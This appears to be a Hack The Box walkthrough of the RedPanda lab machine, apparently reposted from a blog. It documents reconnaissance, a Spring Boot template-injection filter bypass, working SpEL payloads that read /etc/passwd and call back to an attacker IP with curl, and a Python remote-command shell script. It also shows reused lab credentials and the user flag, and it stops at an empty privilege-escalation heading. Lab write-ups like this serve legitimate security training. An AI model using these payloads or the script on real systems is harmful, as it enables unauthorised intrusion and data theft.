Hackthebox - RedPanda Box Walkthrough

admin, 2023-06-05 22:10:52

Box information

[screenshot: box information card]

Box type

[screenshot: box type]
Information gathering

Nmap

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.170

Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 09:15 CST
Nmap scan report for 10.10.11.170
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 23 Oct 2022 01:16:00 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 23 Oct 2022 01:16:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 23 Oct 2022 01:16:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=10/23%Time=635495D0%P=arm-apple-darwin21.5.0%
SF:r(GetRequest,690,"HTTP/1.1\x20200\x20\r\nContent-Type:\x20text/html;ch
SF:arset=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sun,\x2023\x20Oct
SF:\x202022\x2001:16:00\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x2
SF:0html>\n<html\x20lang="en"\x20dir="ltr">\n\x20\x20<head>\n\x20\x20
SF:\x20\x20<meta\x20charset="utf-8">\n\x20\x20\x20\x20<meta\x20author="w
SF:ooden_k">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://co
SF:depen.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel="sty
SF:lesheet"\x20href="css/panda.css"\x20type="text/css">\n\x20\x20\x2
SF:0\x20<link\x20rel="stylesheet"\x20href="css/main.css"\x20type="te
SF:xt/css">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20|\x20Made
SF:\x20with\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n
SF:\x20\x20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20
SF:class='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear
SF:\x20right'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20le
SF:ft'>\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x
SF:20\x20\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x
SF:20</div>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1.1\x202
SF:00\x20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x
SF:20Sun,\x2023\x20Oct\x202022\x2001:16:01\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1.1\x20400\x20\r\nContent-Type:\x20t
SF:ext/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x2
SF:0435\r\nDate:\x20Sun,\x2023\x20Oct\x202022\x2001:16:02\x20GMT\r\nConnec
SF:tion:\x20close\r\n\r\n<!doctype\x20html><html\x20lang="en"><head><tit
SF:le>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><styl
SF:e\x20type="text/css">body\x20{font-family:Tahoma,Arial,sans-serif;}\x
SF:20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20
SF:h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:
SF:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20.line\x20{h
SF:eight:1px;background-color:#525D76;border:none;}</style></head><body><h
SF:1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></
SF:html>");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/23%OT=22%CT=1%CU=40350%PV=Y%DS=2%DC=T%G=Y%TM=635496
OS:14%P=arm-apple-darwin21.5.0)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M53
OS:9ST11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   537.83 ms 10.10.14.1
2   537.94 ms 10.10.11.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.28 seconds

HTTP

[screenshot: the Red Panda Search home page]

Quite a cute little red panda, and it even blinks.

There's a search box underneath; let's search for something random and see what happens.

[screenshot: search results]

Looking at the interface, it clearly queries a database, and that instinctively suggests there might be an injection vulnerability.

Nothing came out of my tests, so let's try fuzzing.

Fuzz

 lucifiel@MacBookPro  ~  ffuf -u 'http://10.10.11.170:8080/FUZZ' -w /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.170:8080/FUZZ
 :: Wordlist         : FUZZ: /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

stats                   [Status: 200, Size: 987, Words: 200, Lines: 33, Duration: 619ms]
error                   [Status: 500, Size: 86, Words: 1, Lines: 1, Duration: 617ms]
search                  [Status: 405, Size: 117, Words: 3, Lines: 1, Duration: 616ms]
                        [Status: 200, Size: 1543, Words: 368, Lines: 56, Duration: 401ms]
:: Progress: [30000/30000] :: Job [1/1] :: 8724 req/sec :: Duration: [0:00:41] :: Errors: 10271 ::

There's a stats directory; let's take a look.

[screenshots: the /stats page]

Some images were found here; let's try to fetch them.

[screenshot: one of the images from /stats]

The hint here confirms there is an injection, though to be fair, the image is pretty funny.

Since SQL injection doesn't work, let's try SSTI instead; either way, we can be confident the vulnerability is some kind of injection.

[screenshot: the SSTI test result]

Testing confirmed it: the working syntax is *{7*7}. Replacing the $ in SSTI payloads with * is enough to bypass the filter.

Exploitation

From the nmap results we know the site is built with Spring Boot, so it's a Java application.

So let's look through the SSTI payload collections for something suitable:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false

Successfully read the /etc/passwd file.

That works, but converting every command into that format is a bit of a hassle, so I found another article:

https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/el-expression-language.md

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")}

[screenshot: server response to the whoami payload]

Running it directly seems to return an error, so let's start an HTTP server and test whether the command executes:

python3 -m http.server 80

Then change the command to make a request back to us:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://10.10.14.2")}
 lucifiel@MacBookPro  ~  python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.11.170 - - [23/Oct/2022 10:02:07] "GET / HTTP/1.1" 200 -

Let's just write an RCE script.

#!/usr/bin/python3
import requests
from cmd import Cmd
from bs4 import BeautifulSoup


# Raw string so the backslashes in the banner are not treated as escapes.
print(r"""
 __          __    __       ______     __      _______     __      _______     __
|  |        |  |  |  |     /      |   |  |    |   ____|   |  |    |   ____|   |  |
|  |        |  |  |  |    |  ,----'   |  |    |  |__      |  |    |  |__      |  |
|  |        |  |  |  |    |  |        |  |    |   __|     |  |    |   __|     |  |
|  `----.   |  `--'  |    |  `----.   |  |    |  |        |  |    |  |____    |  `----.
|_______|    \______/      \______|   |__|    |__|        |__|    |_______|   |_______|

""")


class RCE(Cmd):
    # ANSI colours: red prompt, white input text.
    prompt = "\033[1;31m$\033[1;37m "

    def decimal(self, args):
        comando = args
        decimales = []

        # Encode every character of the command as its decimal code point,
        # so the payload contains no quotes or other filtered characters.
        for i in comando:
            decimales.append(str(ord(i)))
        payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % decimales[0]

        for i in decimales[1:]:
            payload += ".concat(T(java.lang.Character).toString({}))".format(i)

        payload += ").getInputStream())}"
        data = {"name": payload}
        requer = requests.post("http://10.10.11.170:8080/search", data=data)
        # The template echoes the evaluated expression inside the first <h2>.
        parser = BeautifulSoup(requer.content, 'html.parser')
        grepcm = parser.find_all("h2")[0].get_text()
        result = grepcm.replace('You searched for:', '').strip()
        print(result)

    def default(self, args):
        try:
            self.decimal(args)
        except Exception:
            print("%s: command not found" % (args))


RCE().cmdloop()
 lucifiel@MacBookPro  ~/Desktop  python3 exploip.py

 __          __    __       ______     __      _______     __      _______     __
|  |        |  |  |  |     /      |   |  |    |   ____|   |  |    |   ____|   |  |
|  |        |  |  |  |    |  ,----'   |  |    |  |__      |  |    |  |__      |  |
|  |        |  |  |  |    |  |        |  |    |   __|     |  |    |   __|     |  |
|  `----.   |  `--'  |    |  `----.   |  |    |  |        |  |    |  |____    |  `----.
|_______|    \______/      \______|   |__|    |__|        |__|    |_______|   |_______|


$ whoami
woodenk
$ id
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)

Commands run successfully, but it's still not as convenient as a shell, so let's look for something that can get us one.

In the file /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java I found a set of credentials:

conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/red_panda", "woodenk", "RedPandazRule");
username = woodenk
password = RedPandazRule
 lucifiel@MacBookPro  ~/Desktop  ssh woodenk@10.10.11.170
woodenk@10.10.11.170's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 24 Oct 2022 03:15:10 AM UTC

  System load:           0.02
  Usage of /:            80.9% of 4.30GB
  Memory usage:          41%
  Swap usage:            0%
  Processes:             213
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.170
  IPv6 address for eth0: dead:beef::250:56ff:feb9:1c2


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Oct 24 03:14:58 2022 from 10.10.14.11
woodenk@redpanda:~$ whoami&&id
woodenk
uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk)

Got a shell as the user.

woodenk@redpanda:~$ cat user.txt
a00d4342cd040f667d3dbfee34a49451

Got the user flag.

Privilege escalation


Originally published on the WeChat official account 路西菲尔的故事汇: Hackthebox - RedPanda 靶场实战
Reposted by CN-SEC 中文网 (please keep this link when reposting): https://cn-sec.com/archives/1715121.html